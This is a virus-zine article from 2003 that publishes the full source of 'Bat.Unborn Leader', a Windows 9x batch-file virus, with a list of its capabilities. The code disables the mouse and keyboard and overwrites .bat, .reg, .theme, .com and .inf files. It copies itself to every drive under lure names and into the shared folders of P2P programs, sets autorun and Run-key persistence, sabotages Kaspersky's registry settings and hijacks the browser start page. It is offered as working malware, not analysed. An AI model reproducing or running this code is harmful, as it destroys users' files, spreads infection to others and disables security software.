Redemption
Last article Table of contents Next article

Strange Article - Bat.Unborn Leader by DvL

 finished on: 22.09.2003, 15:15
 size: 10.927 bytes
 runs on: win9x

 ** Capabilities **

 * multi-infector, infects .bat, .reg, .theme, autorun.inf, .com, .inf
 * in autorun.inf infection the virus will run every time the user enters
   in "my computer"
 * in .com infection, some .com files will be overwritten with a small .com
   file that only displays a silly message (payload), it can not spread itself
 * .inf infection was designed to affect the desktop.inf file used by atari
   to display the desktop of the current machine running, but it will also
   overwrite all .inf files from "inf" folder or any other it found
 * attacks Kaspersky AntiVirus via registry
 * spreads via p2p
 * it will copy itself on every disk (except b:\)
 * it will set my webpage as the default internet startup page
 * it will run every time the computer is restarted via registry

=====[begin code]===============================================================
cLS
cTtY NuL
EChO OFf
bReAK oFF
rUNdLl32.ExE MoUSe,DiSAblE
RuNDlL32.ExE kEYboARd,diSAblE
Md c:\ >nul
CoPy %0 c:\\joke.bat >nul
echo.[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]>_
echo.DefaultValue=c:\windows\Explorer.exe,0>>_
echo.>>_
echo.[CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon]>>_
echo.DefaultValue=c:\windows\System\shell32.dll,0>>_
echo.>>_
echo.[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]>>_
echo.empty=c:\windows\System\shell32.dll,0>>_
echo.full=c:\windows\System\shell32.dll,0>>_
echo.>>_
echo.>>_
echo.[Control Panel\Colors]>>_
echo.ActiveTitle=0 0 0>>_
echo.Background=0 0 0>>_
echo.Hilight=0 0 0>>_
echo.HilightText=0 0 0>>_
echo.TitleText=0 0 0>>_
echo.Window=0 0 0>>_
echo.WindowText=0 0 0>>_
echo.Scrollbar=0 0 0>>_
echo.InactiveTitle=0 0 0>>_
echo.Menu=0 0 0>>_
echo.WindowFrame=0 0 0>>_
echo.MenuText=0 0 0>>_
echo.ActiveBorder=0 0 0>>_
echo.InactiveBorder=0 0 0>>_
echo.AppWorkspace=0 0 0>>_
echo.ButtonFace=0 0 0>>_
echo.ButtonShadow=0 0 0>>_
echo.GrayText=0 0 0>>_
echo.ButtonText=0 0 0>>_
echo.InactiveTitleText=0 0 0>>_
echo.ButtonHilight=0 0 0>>_
echo.ButtonDkShadow=0 0 0>>_
echo.ButtonLight=0 0 0>>_
echo.InfoText=0 0 0>>_
echo.InfoWindow=0 0 0>>_
echo.>>_
echo.[Control Panel\Cursors]>>_
echo.Arrow=>>_
echo.Help=>>_
echo.AppStarting=>>_
echo.Wait=>>_
echo.NWPen=>>_
echo.No=>>_
echo.SizeNS=>>_
echo.SizeWE=>>_
echo.Crosshair=>>_
echo.IBeam=>>_
echo.SizeNWSE=>>_
echo.SizeNESW=>>_
echo.SizeAll=>>_
echo.UpArrow=>>_
echo.DefaultValue=Windows Default>>_
echo.>>_
echo.[Control Panel\Desktop]>>_
echo.Wallpaper=>>_
echo.TileWallpaper=0>>_
echo.WallpaperStyle=0>>_
echo.Pattern=(None)>>_
echo.ScreenSaveActive=0>>_
echo.>>_
echo.>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\.Default\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\AppGPFault\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Maximize\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\MenuCommand\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\MenuPopup\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Minimize\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Open\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RestoreDown\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RestoreUp\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RingIn\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Ringout\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemAsterisk\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemDefault\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemExit\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemHand\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemQuestion\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemStart\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\Explorer\EmptyRecycleBin\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Close\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.>>_
echo.>>_
echo.[Metrics]>>_
echo.IconMetrics=76 0 0 0 75 0 0 0 75 0 0 0 0 0 0 0 248 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 2 0 0 0 2 0 15 6 0 0 0 0 151 17 63 1 243 21>>_
echo.NonclientMetrics=84 1 0 0 1 0 0 0 13 0 0 0 13 0 0 0 18 0 0 0 18 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 188 2 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 15 0 0 0 15 0 0 0 248 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 188 2 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 18 0 0 0 18 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0>>_
echo.>>_
echo.>>_
echo.[boot]>>_
echo.SCRNSAVE.EXE=c:\\joke.bat>>_
echo.>>_
echo.[MasterThemeSelector]>>_
echo.MTSM=DABJDKT>>_
echo.ThemeColorBPP=4>>_
%comspec% nul /f /c if exist c:\nul copy %0 c:\cleanpc.bat
%comspec% nul /f /c if exist d:\nul copy %0 d:\winswp386.bat
%comspec% nul /f /c if exist e:\nul copy %0 e:\happy.bat
%comspec% nul /f /c if exist f:\nul copy %0 f:\funny.bat
%comspec% nul /f /c if exist g:\nul copy %0 g:\nice.bat
%comspec% nul /f /c if exist h:\nul copy %0 h:\freemp3.bat
%comspec% nul /f /c if exist i:\nul copy %0 i:\chicks.bat
%comspec% nul /f /c if exist j:\nul copy %0 j:\cunny.bat
%comspec% nul /f /c if exist k:\nul copy %0 k:\bigtits.bat
%comspec% nul /f /c if exist l:\nul copy %0 l:\strange.bat
%comspec% nul /f /c if exist m:\nul copy %0 m:\flower.bat
%comspec% nul /f /c if exist n:\nul copy %0 n:\convert.bat
%comspec% nul /f /c if exist o:\nul copy %0 o:\compress.bat
%comspec% nul /f /c if exist p:\nul copy %0 p:\pics.bat
%comspec% nul /f /c if exist q:\nul copy %0 q:\article.bat
%comspec% nul /f /c if exist r:\nul copy %0 r:\driver.bat
%comspec% nul /f /c if exist s:\nul copy %0 s:\sblaster.bat
%comspec% nul /f /c if exist t:\nul copy %0 t:\cdrom.bat
%comspec% nul /f /c if exist u:\nul copy %0 u:\update.bat
%comspec% nul /f /c if exist v:\nul copy %0 v:\add-on.bat
%comspec% nul /f /c if exist w:\nul copy %0 w:\program.bat
%comspec% nul /f /c if exist x:\nul copy %0 x:\contest.bat
%comspec% nul /f /c if exist y:\nul copy %0 y:\zine.bat
%comspec% nul /f /c if exist z:\nul copy %0 z:\test.bat
%comspec% nul /f /c if exist a:\nul copy %0 a:\winstart.bat
Copy %0 c:\kazaa\myshar~1\document.bat >nul
cOpy %0 c:\mydown~1\document.bat >nul
coPy %0 c:\mydocu~1\document.bat >nul
copy %0 c:\progra~1\applej~1\incoming\document.bat >nul
copy %0 c:\progra~1\bearsh~1\shared\document.bat >nul
copy %0 c:\progra~1\edonke~1\incoming\document.bat >nul
copy %0 c:\progra~1\emule\incoming\document.bat >nul
copy %0 c:\progra~1\grokster\mygrok~1\document.bat >nul
copy %0 c:\progra~1\icq\shared~1\document.bat >nul
copy %0 c:\progra~1\kazaa\myshar~1\document.bat >nul
copy %0 c:\progra~1\kazaal~1\myshar~1\document.bat >nul
copy %0 c:\progra~1\kmd\myshar~1\document.bat >nul
copy %0 c:\progra~1\limewire\shared\document.bat >nul
copy %0 c:\progra~1\morpheus\myshar~1\document.bat >nul
copy %0 c:\progra~1\overnet\bundles\document.bat >nul
echo.REGEDIT4>__
echo.>>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."avpfolder"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."VEDataFilePath"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."VEIndexFilePath"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."MainDir"="c:\">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."Folder"="c:\">>__
echo.[HKCU\Software\Microsoft\Internet Explorer\Main]>>__
echo."Start Page"="www.geocities.com/ratty_dvl/BATch/main.htm">>__
echo.[HKLM\Software\Microsoft\Windows\CurrentVersion\Run\]>>__
echo.@="start command /c c:\\joke.bat">>__
echo.[AutoRun]>___
echo.open=c:\\joke.bat>>___
echo.icon=c:\windows\System\shell32.dll,0>>___
%comspec% nul /f /c if exist c:\nul cOPy ___ c:\autorun.inf
%comspec% nul /f /c if exist d:\nul CopY ___ d:\autorun.inf
%comspec% nul /f /c if exist e:\nul cOPy ___ e:\autorun.inf
%comspec% nul /f /c if exist f:\nul CopY ___ f:\autorun.inf
echo.X5O!P%%@AP[4\PZX54(P^)7CC)7}$          Fucked by [DvL]          $H+H*>_!
echo.#a000000>._
echo.#b000000>>._
echo.#c7770007000600070055200505552220770557075055507703111103>>._
echo.#d>>._
echo.#E 18 12>>._
echo.#W 00 00 00 07 26 0C 00 @>>._
echo.#W 00 00 02 0B 26 09 00 @>>._
echo.#W 00 00 0A 0F 1A 09 00 @>>._
echo.#W 00 00 0E 01 1A 09 00 @>>._
echo.#M 00 00 00 FF A FLOPPY DISK@ @>>._
echo.#M 00 01 00 FF B FLOPPY DISK@ @>>._
echo.#T 00 03 02 FF   TRASH@ @>>._
echo.#F FF 04   @ *.*@ @>>._
echo.#D FF 01   @ *.*@ @>>._
echo.#G 03 FF   *.APP@ @ @>>._
echo.#G 03 FF   *.PRG@ @ @>>._
echo.#P 03 FF   *.TTP@ @ @>>._
echo.#F 03 04   *.TOS@ @ @>>._
FOr %%* In (*.theme ..\*.theme c:\mydocu~1\*.theme %windir%\*.theme %path%\*.theme %windir%\desktop\*.theme %windir%\command\ebd\*.theme %windir%\system\*.theme c:\progra~1\plus!\themes\*.theme %themedir%\*.theme) dO aTTriB -r -h -s -a %%*
fOR %%* iN (*.theme ..\*.theme c:\mydocu~1\*.theme %windir%\*.theme %path%\*.theme %windir%\desktop\*.theme %windir%\command\ebd\*.theme %windir%\system\*.theme c:\progra~1\plus!\themes\*.theme %themedir%\*.theme) Do cOPy _ %%* /Y
FOr %%_ In (c:\*.com *.com ..\*.com c:\mydocu~1\*.com %windir%\*.com %path%\*.com %windir%\desktop\*.com %windir%\system\*.com) dO aTTriB -R -h -S -a %%_
fOR %%_ iN (c:\*.com *.com ..\*.com c:\mydocu~1\*.com %windir%\*.com %path%\*.com %windir%\desktop\*.com %windir%\system\*.com) Do cOPy _! %%_ /y
FOr %%! In (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) dO aTTriB -R -h -S -a %%!
fOR %%! iN (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) Do cOPy %0 %%! /y
FOr %%. In (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) dO aTTriB -R -h -S -a %%.
fOR %%. iN (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) Do cOPy __ %%. /y
FOr %%- In (*.in* ..\*.in* c:\mydocu~1\*.in* %windir%\inf\*.in* %windir%\*.in* %path%\*.in* c:\*.in* %windir%\system\*.in* c:\progra~1\steem\*.in* c:\progra~1\gemul8r\*.in* c:\steem\*.in* c:\gemul8r\*.in*) dO aTTriB -R -h -S -a %%-
fOR %%- iN (*.in* ..\*.in* c:\mydocu~1\*.in* %windir%\inf\*.in* %windir%\*.in* %path%\*.in* c:\*.in* %windir%\system\*.in* c:\progra~1\steem\*.in* c:\progra~1\gemul8r\*.in* c:\steem\*.in* c:\gemul8r\*.in*) Do cOPy ._ %%- /y
rEN __ __.reg
regedit /s __.reg
cLS

living virus